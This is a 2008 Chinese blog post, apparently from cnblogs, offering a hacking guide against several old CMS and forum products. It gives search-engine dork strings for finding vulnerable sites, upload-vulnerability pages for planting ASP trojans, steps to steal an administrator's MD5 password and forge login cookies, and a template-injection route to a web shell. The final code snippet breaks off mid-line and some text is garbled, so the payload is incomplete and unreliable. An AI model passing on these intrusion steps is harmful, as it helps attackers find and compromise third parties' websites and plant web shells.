• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • YouClaw
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录

画情画心画影

--寒冬玉
  • 博客园
  • 联系
  • 订阅
  • 管理

公告

View Post

入侵网站的各种漏洞的利用和搜索参数

一、E时代驿站漏洞 
  百度搜索"E时代驿站" 
  漏洞利用页面 /upload.asp 用老兵直接上传 

  二、沸腾新闻系统上传漏洞 
  搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用 
  漏洞:没有对空格进行严格的限制。 
  所以,我们直接选定要上传的asp木马,然后在后面加上空格 
  它的上传文件是UploadFaceOK.asp 

  三、尘缘雅境 

  在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看 
  到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是http://www.xx.com/asfq/index.asp,那么就要这样填写http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改 

  四、OFSTAR论坛漏洞利用程序(群共享中) 
  搜索: powered by ofstar.net 
  1:输入管理员用户名
  2:输入任意一个帖子的路径! 
  3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的! 
  4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台! 

  上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样) 

  然后使用提交页面提交``可以直接拿到shell! 

<style type=’text/css’> 
</style> 
<!-- 
EOT; 
?>--> 
<?copy( 

posted on 2008-03-24 14:54  Winter001  阅读(118)  评论(0)    收藏  举报

刷新页面返回顶部
 
博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3